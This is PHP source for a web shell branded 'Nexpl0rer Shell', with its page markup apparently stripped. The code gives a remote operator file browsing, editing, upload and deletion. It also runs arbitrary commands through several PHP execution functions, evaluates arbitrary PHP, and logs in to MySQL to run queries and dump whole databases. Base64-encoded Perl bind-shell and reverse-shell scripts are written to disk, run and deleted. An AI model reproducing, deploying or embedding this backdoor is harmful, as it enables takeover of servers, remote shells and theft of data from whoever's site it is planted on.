<?="[nexpl0rer@".getenv("HTTP_HOST")." ~]"?>

Safe Mode: OFF
"; $safemode_on_msg = "Safe Mode: ON
"; $gpc_off_msg = "Magic Quotes: OFF
"; $gpc_on_msg = "Magic Quotes: ON
"; $auf_on_msg = "Allow URL Fopen: ON
"; $auf_off_msg = "Allow URL Fopen: OFF
"; $reglobals_on_msg = "Register Globals: ON
"; $reglobals_off_msg = stripslashes("Register Globals: OFF
"); $uname = php_uname()."
"; (ini_get("safe_mode") == 0) ? $safemode = $safemode_off_msg : $safemode = $safemode_on_msg; (ini_get("magic_quotes_gpc") == 0) ? $gpc = $gpc_off_msg : $gpc = $gpc_on_msg; (ini_get("allow_url_fopen") == 1) ? $auf = $auf_on_msg : $auf = $auf_off_msg; (ini_get("register_globals") == 1) ? $reglobals = $reglobals_on_msg : $reglobals = $reglobals_off_msg; $freespace = disk_free_space($dir); $totalspace = disk_total_space($dir); $percentfree = ($freespace*100)/$totalspace; $percentbusy = 100-$percentfree; $freespace = intval((($freespace/1024)/1024)/1024); $totalspace = intval((($totalspace/1024)/1024)/1024); $freespace .= " GB"; $totalspace .= " GB"; $current_user = "Who are you? ".get_current_user()."
"; $uid = "Uid: ".getmyuid()." Gid: ".getmygid()."
"; if ($_POST['mode'] == "ls") { //Directory listing $output .= "

Directory listing:

"; $opendir = opendir($dir)or print("Can't open directory"); while ($file=readdir($opendir)){ if ($dir == realpath(".")) { if (is_file($file)){ $perms = fileperms($file); $info = (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0800) ? 's' : 'x'); $output.= "| file |".$info."|".$file." - Edit - Delete
"; } else { $perms = fileperms($file); $info = (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0800) ? 's' : 'x' ); $output .= "| dir |".$info."|".$file." - Go
"; } } else { if (is_file($dir.$file)){ $perms = fileperms($file); $info = (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0800) ? 's' : 'x' ); $output.= "| file |".$info."|".$file." - Edit - Delete
"; } else { $perms = fileperms($file); $info = (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0800) ? 's' : 'x' ); $output .= "| dir |".$info."|".$file." - Go
"; } } } $output .= "

"; } //Editing file... if ($_POST['mode']=="edit") { ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile']; $content = file_get_contents($file); $output .= ""; } if ($_POST['mode']=="doedit") { ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile']; $output .= $file."
"; $fh = fopen($file, "w+")or die("Error: cannot open file"); fwrite($fh, stripslashes($_POST['newtext']))or die("Error: cannot write to file"); fclose($fh); $output .= "Done."; } //Making file.. if ($_POST['mode'] == "mkfile") { ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile']; $output .= ""; } if ($_POST['mode'] == "domkfile") { ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile']; $fh = fopen($file, "w+")or die("Error: cannot create file"); fwrite($fh, stripslashes($_POST['text']))or die("Error: cannot write to file"); fclose($fh); $output .= "Made."; } //Deleting file.. if ($_POST['mode'] == "delfile") { ($dir==realpath(".")) ? $file=$_POST['delfile'] : $file=$dir.$_POST['delfile']; unlink($file)or die("Error: cannot delete file"); $output .= "File deleted."; } // cmd... if ($_POST['mode'] == "cmd") { switch ($_POST['func']) { case "system": system(stripslashes($_POST['cmd'])); die(); break; case "popen": $handle = popen($_POST['cmd'].' 2>&1', 'r'); echo "'$handle'; " . gettype($handle) . "\n"; $read = fread($handle, 2096); echo $read; pclose($handle); die(); break; case "shell_exec": shell_exec(stripslashes($_POST['cmd'])); die(); break; case "exec": exec(stripslashes($_POST['cmd'])); die(); break; case "passthru": passthru(stripslashes($_POST['cmd'])); die(); break; } die(); } // upload if ($_POST['mode'] == "uploadz") { $percorso = $_FILES['miofile']['tmp_name']; $nome = $_FILES['miofile']['name']; if (move_uploaded_file($percorso, $dir.$nome)) { $output .= "

$nome Has Been Saved!"; } else { $output = "Cannot upload"; } } // rename if ($_POST['mode'] == "renfile") { rename($dir.$_POST['oldname'], $dir.$_POST['newname'])or die("Cannot rename file"); $output = "File renamed."; } // Bind port if ($_POST['mode'] == "bind") { $sourz['windows'] = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQojIFBlcmwgQmFja2QwMHIgQmluRCBTaGVsbA0KIyBuMHQgdmVyeSBwcml2OA0KIyBjMGRlZCBieSBOZXhlbiAtMzEzMzcgcGhwIGMwZGFoIA0KIyAtPSBOZXhlbiByMHggPS0NCnVzZSBTb2NrZXQ7ICNwZXIgZ2VzdGlyZSBpIHNvY2tldA0KdXNlIEZpbGVIYW5kbGU7ICMgcGVyIGxcJ2F1dG9mbHVzaA0KJG1heF9jb25uPTEwOw0KJHBvcnRhX2xvY2FsZT0zMTMzNzsNCiRwYWRkcl9sb2NhbGU9cGFja19zb2NrYWRkcl9pbigkcG9ydGFfbG9jYWxlLElOQUREUl9BTlkpOw0Kc29ja2V0KFNFUlYsQUZfSU5FVCxTT0NLX1NUUkVBTSxcJ3RjcFwnKSB8fCBkaWUoXCJFcnJvcmU6ICQhXCIpOyAgI3NlcnZlci1zb2NrZXQNCnNldHNvY2tvcHQoU0VSVixTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKSB8fCBkaWUoXCJFcnJvcmU6ICQhXCIpOw0KYmluZChTRVJWLCRwYWRkcl9sb2NhbGUpIHx8IGRpZShcIkVycm9yZTogJCFcIik7DQpsaXN0ZW4oU0VSViwkbWF4X2Nvbm4pIHx8IGRpZShcIkVycm9yZTogJCFcIik7DQpteSAkcGFkZHJfc2luZz1hY2NlcHQoU0lORywgU0VSVik7ICNhY2NldHRvIGxhIGNvbm5lc3Npb25lIGRhbCBjbGllbnQNCm15KCRzaW5nX3BvcnRhLCRzaW5nX2FkZHIsJGdldCk9dW5wYWNrX3NvY2thZGRyX2luKCRwYWRkcl9zaW5nKTsNClNJTkctPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgXCI+JlNJTkdcIik7DQpvcGVuKFNURE9VVCxcIj4mU0lOR1wiKTsNCm9wZW4oU1RERVJSLFwiPiZTSU5HXCIpOw0KZXhlYyhcJ0M6XFx3aW5kb3dzXFxzeXN0ZW0zMlxcY21kLmV4ZVwnKTsNCmNsb3NlKFNJTkcpOw=="); $sourz['linux'] = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQojIFBlcmwgQmFja2QwMHIgQmluRCBTaGVsbA0KIyBuMHQgdmVyeSBwcml2OA0KIyBjMGRlZCBieSBOZXhlbiAtMzEzMzcgcGhwIGMwZGFoIA0KIyAtPSBOZXhlbiByMHggPS0NCnVzZSBTb2NrZXQ7ICNwZXIgZ2VzdGlyZSBpIHNvY2tldA0KdXNlIEZpbGVIYW5kbGU7ICMgcGVyIGxcJ2F1dG9mbHVzaA0KJG1heF9jb25uPTEwOw0KJHBvcnRhX2xvY2FsZT0zMTMzNzsNCiRwYWRkcl9sb2NhbGU9cGFja19zb2NrYWRkcl9pbigkcG9ydGFfbG9jYWxlLElOQUREUl9BTlkpOw0Kc29ja2V0KFNFUlYsQUZfSU5FVCxTT0NLX1NUUkVBTSxcJ3RjcFwnKSB8fCBkaWUoXCJFcnJvcmU6ICQhXCIpOyAgI3NlcnZlci1zb2NrZXQNCnNldHNvY2tvcHQoU0VSVixTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKSB8fCBkaWUoXCJFcnJvcmU6ICQhXCIpOw0KYmluZChTRVJWLCRwYWRkcl9sb2NhbGUpIHx8IGRpZShcIkVycm9yZTogJCFcIik7DQpsaXN0ZW4oU0VSViwkbWF4X2Nvbm4pIHx8IGRpZShcIkVycm9yZTogJCFcIik7DQpteSAkcGFkZHJfc2luZz1hY2NlcHQoU0lORywgU0VSVik7ICNhY2NldHRvIGxhIGNvbm5lc3Npb25lIGRhbCBjbGllbnQNCm15KCRzaW5nX3BvcnRhLCRzaW5nX2FkZHIsJGdldCk9dW5wYWNrX3NvY2thZGRyX2luKCRwYWRkcl9zaW5nKTsNClNJTkctPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgXCI+JlNJTkdcIik7DQpvcGVuKFNURE9VVCxcIj4mU0lOR1wiKTsNCm9wZW4oU1RERVJSLFwiPiZTSU5HXCIpOw0KZXhlYyhcJy9iaW4vc2hcJyk7DQpjbG9zZShTSU5HKTs="); (strtoupper(substr(PHP_OS,0,3)) == "WIN") ? $source = $sourz['windows'] : $source = $sourz['linux']; $fh = fopen("bind.pl", "w+")or die("error."); fwrite($fh, $source)or die("error."); fclose($fh); passthru("perl bind.pl"); unlink("bind.pl"); } // Reverse c0nn if ($_POST['mode'] == "reverse") { $source['linux'] = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gJEFSR1ZbMV07DQoNCiAgICBpZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIGRjMi5wbCA8SG9zdD4gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsrXSBDb25uZWN0aW5nIHRvICRob3N0XG4iOw0KJHByb3QgPSBnZXRwcm90b2J5bmFtZSgndGNwJyk7ICMgdSBjYW4gY2hhbmdlIHRoaXMNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCBpbmV0X2F0b24oJGhvc3QpKSkge2RpZSgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTt9DQogIG9wZW4oU1RESU4sIj4mU0VSVkVSIik7DQogIG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOw0KICBvcGVuKFNUREVSUiwiPiZTRVJWRVIiKTsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cbiI7DQpwcmludCAiPSAgICAgIENvbm5lY3RNZSAoQmFjayBCYWNrZG9vcikgICAgICA9XG4iOw0KcHJpbnQgIj0gICAgIElSQU4gSEFDS0VSWiBTRUNVUklUWSBURUFNICAgICAgPVxuIjsNCnByaW50ICI9ICAgICAgICAgIGNvZGVkIGJ5IEhlc3NhbS14ICAgICAgICAgID1cbiI7DQpwcmludCAiLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iOw0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsg"); $source['windows'] = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gJEFSR1ZbMV07DQoNCiAgICBpZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIGRjMi5wbCA8SG9zdD4gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsrXSBDb25uZWN0aW5nIHRvICRob3N0XG4iOw0KJHByb3QgPSBnZXRwcm90b2J5bmFtZSgndGNwJyk7ICMgdSBjYW4gY2hhbmdlIHRoaXMNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCBpbmV0X2F0b24oJGhvc3QpKSkge2RpZSgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTt9DQogIG9wZW4oU1RESU4sIj4mU0VSVkVSIik7DQogIG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOw0KICBvcGVuKFNUREVSUiwiPiZTRVJWRVIiKTsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cbiI7DQpwcmludCAiPSAgICAgIENvbm5lY3RNZSAoQmFjayBCYWNrZG9vcikgICAgICA9XG4iOw0KcHJpbnQgIj0gICAgIElSQU4gSEFDS0VSWiBTRUNVUklUWSBURUFNICAgICAgPVxuIjsNCnByaW50ICI9ICAgICAgICAgIGNvZGVkIGJ5IEhlc3NhbS14ICAgICAgICAgID1cbiI7DQpwcmludCAiLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iOw0KICBleGVjKCdDOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUnKTs="); (strtoupper(substr(PHP_OS,0,3)) == "WIN") ? $sourz = $source['windows'] : $sourz = $source['linux']; $fh = fopen("reverse.pl", "w+")or die("error."); fwrite($fh, $sourz)or die("error."); fclose($fh); $output = passthru("perl reverse.pl ".$_POST['ip']." ".$_POST['port']); unlink("reverse.pl"); } // MySQL Login if ($_POST['mode'] == "loginsql") { setcookie("mysql_user", $_POST['user']); setcookie("mysql_pass",$_POST['pass']); setcookie("mysql_host",$_POST['host']); $link = mysql_connect($_POST['host'], $_POST['user'], $_POST['pass'])or die(mysql_error()); $output = "

"; $output .= ""; } // MySQL Query if ($_POST['mode'] == "sql_query") { $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); (isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print ""; $query = mysql_query(stripslashes($_POST['query']))or die(mysql_error()); while ($risultato = mysql_fetch_array($query)) { foreach ($risultato as $par => $val) { (is_numeric($par)) ? $output .= "" : $output .= $par." => ".$val."
"; } } $output .= ""; } // MySQL Dump if ($_POST['mode'] == "dump_db") { $dump = "# Dumped with Nexpl0rerSh \n"; $db = $_POST['dbname']; $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); (isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print ""; $q = mysql_query("SHOW TABLES")or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $dump .= datadump($table[0]); } $file_name = $db.".sql"; Header("Content-type: application/octet-stream"); Header("Content-Disposition: attachment; filename = $file_name"); echo $dump; die(); } // MkDir if ($_POST['mode'] == "mkdir") { chdir($dir)or die("Error."); if (mkdir($_POST['mkdir'])) { $output = "Directory created."; } } // Eval if ($_POST['mode'] == "eval") { eval(stripslashes($_POST['eval'])); die(); } if ($_POST['mode']=="phpinfo") { phpinfo(); die(); } ?> <?="[nexpl0rer@".getenv("HTTP_HOST")." ~]"?>

Nexpl0rer Shell | PHP R0X | MADE BY NEXEN

Free space: || Total space: (% busy)
|| || || ||